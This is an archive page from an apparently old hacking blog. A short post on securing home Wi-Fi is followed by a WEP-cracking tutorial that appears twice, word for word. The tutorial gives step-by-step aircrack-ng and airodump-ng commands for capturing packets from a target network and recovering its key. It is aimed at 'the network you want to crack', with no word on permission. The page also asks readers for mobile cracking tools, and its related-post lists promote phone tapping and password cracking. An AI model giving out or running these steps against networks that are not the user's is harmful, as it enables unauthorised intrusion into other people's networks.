Wireless: How To Secure Your Wireless Network

Malicious people don’t target big and corporate wireless networks only. If you have a Wi-Fi network at home or in a small office, your network might be attractive also. Malicious people might consider using unprotected and weak protected networks as hubs for malicious and illegal activities. By using an unprotected or weak protected wireless network, they can attack credit cards systems and netbanks from your wireless network and then all the illegal activities seems to originate from your IP address and your home or small office.

Therefore, all wireless networks should be protected with encryption.

Minimum Protection

  • Use WPA or WPA2 encryption (not WEP encryption, it is proven to be unsecure and weak)
  • If your wireless network devices do not support WPA or WPA2, then use WEP with minimum 128 Bit, enable mac address filtering (available in most SOHO routers), and use VPN-based encryption whenever it is possible.
VN:F [1.8.5_1061]
Rating: 7.0/10 (1 vote cast)

Related posts:

  1. Hack Wireless WEP Network
  2. Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP)
  3. Hack Wireless WPA Network
  4. Howto Hack a Wireless WEP Network
  5. Updated the entry on wireless network cracking
  6. HackerGuide: Sniff Live Network Connections Using Ettercap
  7. Microsoft is using Linux
  8. Crack Cisco VPN (hack)
  9. WEP and WPA cracking and hacking tools for Windows Mobile
  10. Crack or Recover Read-only Password Protected Word Document

Comments

WEP and WPA cracking and hacking tools for Windows Mobile

Today I searched the internet for a Wifi scanner and a network security analyzer (read: WPA and WEP cracking tool), but the only tool I found was WiFiFoFum, which is a Wifi scanner.

Feel free to leave a comment if you know any wireless network cracking and hacking tools for Windows Mobile.

VN:F [1.8.5_1061]
Rating: 9.0/10 (1 vote cast)

Related posts:

  1. Hack Wireless WPA Network
  2. Tap, Bug and Spy on a Mobile Phone – Nokia, Samsung, LG, Blackberry
  3. Hack Wireless WEP Network
  4. MySQL Performance Monitoring and Optimization Tools
  5. Linux Hacking Portal
  6. HackerGuide: Sniff Live Network Connections Using Ettercap
  7. Garmin Mobile XT 5 on Nokia N95
  8. Garmin Mobile XT on N5800 – Europe Map 2010.1
  9. Must Have Windows Tools
  10. Updated the entry on wireless network cracking

Comments (20)

Howto Hack a Wireless WEP Network

It is fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack using a plain Linux distribution.

read more | digg story

VN:F [1.8.5_1061]
Rating: 2.0/10 (1 vote cast)

Related posts:

  1. Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP)
  2. Hack Wireless WEP Network
  3. Hack Wireless WPA Network
  4. Updated the entry on wireless network cracking
  5. Wireless: How To Secure Your Wireless Network
  6. Crack Cisco VPN (hack)
  7. How to hack Windows password with Ophcrack
  8. The VMware house of cards
  9. Howto Wiretap – Sniff Network Traffic
  10. Crack mdb Password

Comments (182)

Hack Wireless WEP Network

Aircrack-ng logo

WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia

It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.

Install aircrack-ng – on Debian Etch by:

sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.

UPDATE Oct 12 2008
A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

VN:F [1.8.5_1061]
Rating: 7.5/10 (2 votes cast)

Related posts:

  1. Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP)
  2. Hack Wireless WPA Network
  3. Howto Hack a Wireless WEP Network
  4. Wireless: How To Secure Your Wireless Network
  5. Updated the entry on wireless network cracking
  6. Crack Cisco VPN (hack)
  7. WEP and WPA cracking and hacking tools for Windows Mobile
  8. Crack / Hack a WIFI Using an IPhone / Ipod Touch
  9. HackerGuide: Sniff Live Network Connections Using Ettercap
  10. How to hack Windows password with Ophcrack

Comments (188)

Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP)

Aircrack-ng logo

WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia

It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.

Install aircrack-ng – on Debian Etch by:

sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.

UPDATE Oct 12 2008
A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

VN:F [1.8.5_1061]
Rating: 0.0/10 (0 votes cast)

Related posts:

  1. Hack Wireless WEP Network
  2. Hack Wireless WPA Network
  3. Howto Hack a Wireless WEP Network
  4. Wireless: How To Secure Your Wireless Network
  5. Updated the entry on wireless network cracking
  6. Crack Cisco VPN (hack)
  7. How to hack Windows password with Ophcrack
  8. Crack / Hack a WIFI Using an IPhone / Ipod Touch
  9. Crack or Recover Password Protected Excel Spreadsheet
  10. Howto Wiretap – Sniff Network Traffic

Comments (121)